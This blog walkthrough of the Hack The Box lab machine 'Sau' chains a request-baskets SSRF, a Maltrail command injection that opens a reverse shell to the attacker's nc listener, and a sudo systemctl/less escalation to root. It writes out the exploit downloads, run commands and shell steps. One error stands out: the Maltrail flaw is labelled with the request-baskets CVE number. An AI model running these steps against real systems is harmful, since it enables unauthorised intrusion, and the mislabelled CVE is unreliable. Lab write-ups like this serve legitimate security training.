Sau | syselement's Blog

Edit

Intro

Box Info

🔗 Name

🎯 Target IP

10.10.11.224

📈 Difficulty level

🟩Easy

🐧OS

Linux

Recon

mkdir -p $HOME/htb/sau/nmap
cd $HOME/htb/sau

Start Reconnaissance

# Fast full TCP port scan
nmap -p- --min-rate 10000 10.10.11.224

PORT      STATE    SERVICE
22/tcp    open     ssh
80/tcp    filtered http
8338/tcp  filtered unknown
55555/tcp open     unknown

# Scan open ports with default scripts and version detection
nmap -p <PORTS> -sC -sV -vv -oA nmap/sau 10.10.11.224

cat nmap/sau.nmap

PORT      STATE    SERVICE REASON         VERSION
22/tcp    open     ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 aa:88:67:d7:13:3d:08:3a:8a:ce:9d:c4:dd:f3:e1:ed (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDdY38bkvujLwIK0QnFT+VOKT9zjKiPbyHpE+cVhus9r/6I/uqPzLylknIEjMYOVbFbVd8rTGzbmXKJBdRK61WioiPlKjbqvhO/YTnlkIRXm4jxQgs+xB0l9WkQ0CdHoo/Xe3v7TBije+lqjQ2tvhUY1LH8qBmPIywCbUvyvAGvK92wQpk6CIuHnz6IIIvuZdSklB02JzQGlJgeV54kWySeUKa9RoyapbIqruBqB13esE2/5VWyav0Oq5POjQWOWeiXA6yhIlJjl7NzTp/SFNGHVhkUMSVdA7rQJf10XCafS84IMv55DPSZxwVzt8TLsh2ULTpX8FELRVESVBMxV5rMWLplIA5ScIEnEMUR9HImFVH1dzK+E8W20zZp+toLBO1Nz4/Q/9yLhJ4Et+jcjTdI1LMVeo3VZw3Tp7KHTPsIRnr8ml+3O86e0PK+qsFASDNgb3yU61FEDfA0GwPDa5QxLdknId0bsJeHdbmVUW3zax8EvR+pIraJfuibIEQxZyM=
|   256 ec:2e:b1:05:87:2a:0c:7d:b1:49:87:64:95:dc:8a:21 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEFMztyG0X2EUodqQ3reKn1PJNniZ4nfvqlM7XLxvF1OIzOphb7VEz4SCG6nXXNACQafGd6dIM/1Z8tp662Stbk=
|   256 b3:0c:47:fb:a2:f2:12:cc:ce:0b:58:82:0e:50:43:36 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICYYQRfQHc6ZlP/emxzvwNILdPPElXTjMCOGH6iejfmi
80/tcp    filtered http    no-response
8338/tcp  filtered unknown no-response
55555/tcp open     http    syn-ack ttl 63 Golang net/http server
| http-title: Request Baskets
|_Requested resource was /web
| http-methods: 
|_  Supported Methods: GET OPTIONS
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     X-Content-Type-Options: nosniff
|     Date: Tue, 01 Jul 2025 06:02:02 GMT
|     Content-Length: 75
|     invalid basket name; the name does not match pattern: ^[wd-_\.]{1,250}$
|   GenericLines, Help, LPDString, RTSPRequest, SIPOptions, SSLSessionReq, Socks5: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 302 Found
|     Content-Type: text/html; charset=utf-8
|     Location: /web
|     Date: Tue, 01 Jul 2025 06:01:46 GMT
|     Content-Length: 27
|     href="/web">Found</a>.
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Allow: GET, OPTIONS
|     Date: Tue, 01 Jul 2025 06:01:46 GMT
|     Content-Length: 0
|   OfficeScan: 
|     HTTP/1.1 400 Bad Request: missing required Host header
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|_    Request: missing required Host header
1 service unrecognized despite returning data.[...]
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Browse to http://10.10.11.224:55555/

Powered by request-baskets - version: 1.2.1 - a web service used to colect arbitrary HTTP requests and inspect them via RESTful API or simple web UI

Exploitation

SSRF - Request-baskets

The request-baskets project has been associated with a Server-Side Request Forgery (SSRF) vulnerability, specifically identified as CVE-2023-27163.

CVE-2023-27163 | INCIBE-CERT | INCIBE
Request-Baskets 1.2.1 Server-Side Request Forgery (CVE-2023–27163) | by Imène ALLOUCHE | Medium
This vulnerability affects request-baskets up to version 1.2.1 and allows attackers to forward HTTP requests to internal or private services.
The vulnerability is present in the /api/baskets/{name} component, which can be exploited to access network resources and sensitive information.
Information Disclosure: The SSRF lets attackers retrieve any internal resource over HTTP, enabling exfiltration of sensitive data beyond just unauthenticated images.
Unauthenticated Internal Access: Exploitation grants access to internal services like Nginx, APIs, and databases across the local network without credentials.
Port Scanning and Enumeration: Attackers can scan ports and map internal hosts, exposing network architecture and potential attack surfaces.

An exploit for this vulnerability has been published, demonstrating how attackers can leverage the SSRF flaw to create a local proxy for HTTP requests on the targeted machine.

SSRF Vulnerability Exploit for Request-Baskets (CVE-2023-27163)
entr0pie/CVE-2023-27163: Proof-of-Concept for Server Side Request Forgery (SSRF) in request-baskets (<= v.1.2.1)
PoC via Bash - Request-Baskets 1.2.1 Server-Side Request Forgery - exploit database | Vulners.com
The exploit calls the vulnerable API component to create a new basket, initiating a POST request. The attacker can modify the forward_url parameter to a local service and set the proxy_response to true.

Let's try the following PoC by entr0pie:

wget https://raw.githubusercontent.com/entr0pie/CVE-2023-27163/main/CVE-2023-27163.sh

bash ./CVE-2023-27163.sh http://10.10.11.224:55555/ http://127.0.0.1:80

    Proof-of-Concept of SSRF on Request-Baskets (CVE-2023-27163) || More info at https://github.com/entr0pie/CVE-2023-27163

    > Creating the "izlhms" proxy basket...
    > Basket created!
    > Accessing http://10.10.11.224:55555/izlhms now makes the server request to http://127.0.0.1:80.
    ./CVE-2023-27163.sh: line 43: jq: command not found
    > Response body (Authorization): {"token":"pl7QAVMhXIgCLZKKEqru5rWmaXilHIucmPQ_JurKE_jl"}

Visit the generated URL -> http://10.10.11.224:55555/izlhms

The webserver on port 80 is powered by Maltrail v0.53
Same on port 8338

Foothold

RCE - Maltrail

Maltrail v0.53 is associated with the CVE-2023-27163 vulnerability, which is a remote code execution (RCE) flaw.

This vulnerability allows attackers to execute arbitrary code on the target system without authentication. The exploit leverages a command injection vulnerability in the params.get("username") parameter of the mailtrail/core/http.py file
Exploiting Maltrail v0.53 — Unauthenticated Remote Code Execution (RCE) | by Security Lit Limited | Medium
GitHub - spookier/Maltrail-v0.53-Exploit: RCE Exploit For Maltrail-v0.53
- The username parameter of the login page does not properly sanitize the input, allowing an OS command injection attack
Check manual exploit by Ippsec

# First get a new SSRF url with /login
bash ./CVE-2023-27163.sh http://10.10.11.224:55555/ http://127.0.0.1:80/login

Use the generated URL in the following Maltrail Exploit -> http://10.10.11.224:55555/oxmauw

git clone https://github.com/spookier/Maltrail-v0.53-Exploit.git
cd Maltrail-v0.53-Exploit

The exploit encodes a reverse shell payload in Base64 to bypass potential WAF, IPS/IDS protections, delivers it via a curl request to the target URL and executes it to establish a reverse shell back to the attacker's IP and port.
In this specific case, remove the + "/login" on line 28 of the exploit.py, save and run the modified script

# Start listener on KALI
nc -nvlp 443

python3 exploit.py 10.10.14.5 443 http://10.10.11.224:55555/oxmauw

$ id
id
uid=1001(puma) gid=1001(puma) groups=1001(puma)

Shell upgrade

# script
script /dev/null -c bash
	CTRL+Z
stty raw -echo; fg
# Hit ENTER when cursor blinks
reset
	Terminal type? screen
export TERM=xterm

Shell as user puma

# User Flag
puma@sau:/opt/maltrail$ cd

puma@sau:~$ find / -type f -iname user.txt 2>/dev/null

puma@sau:~$ cat /home/puma/user.txt
71a6b***************************

Privilege Escalation

Systemd CVE-2023-26604

puma@sau:~$ sudo -l
    Matching Defaults entries for puma on sau:
        env_reset, mail_badpass,
        secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

    User puma may run the following commands on sau:
        (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service

systemctl --version
	systemd 245 (245.4-4ubuntu3.22)

puma user can run a specific systemctl command as root without password

Google Systemd 245.4 CVE

Found CVE-2023-26604
Before version 247, systemd failed to set LESSSECURE=1 when running systemctl status via sudo, allowing less (pager) to launch other programs as root if the output didn’t fit the terminal. This could lead to local privilege escalation if sudoers permitted systemctl execution.
CVE-2023–26604. How did i find it? | by Zenmovie | Medium

Shell as root

Run the following command with puma user and exploit less

sudo /usr/bin/systemctl status trail.service

Since the weird TTY and screen, the output gets passed to less
Enter !sh that will run sh and drops to a shell with the root user

# Root Flag
find / -type f -iname root.txt 2>/dev/null
cat /root/root.txt
101ef***************************

Summary

Target runs Request Baskets.
CVE-2023-27163 SSRF vulnerability present.
Malicious basket created to proxy internal requests.
Internal Maltrail service discovered via SSRF.
Maltrail has unauthenticated OS command injection.
Exploited injection to get reverse shell as puma.
Enumerated sudo permissions.
Found systemd less pager vulnerability (CVE-2023-26604).
Abused less to execute commands as root.

Extra

PreviousGoodGames NextSpectra

Last updated 1 month ago

hashtagIntro

hashtagRecon

hashtagExploitation

hashtagSSRF - Request-baskets

hashtagFoothold

hashtagRCE - Maltrail

hashtagShell as user puma

hashtagPrivilege Escalation

hashtagSystemd CVE-2023-26604

hashtagShell as root

hashtagSummary

hashtagExtra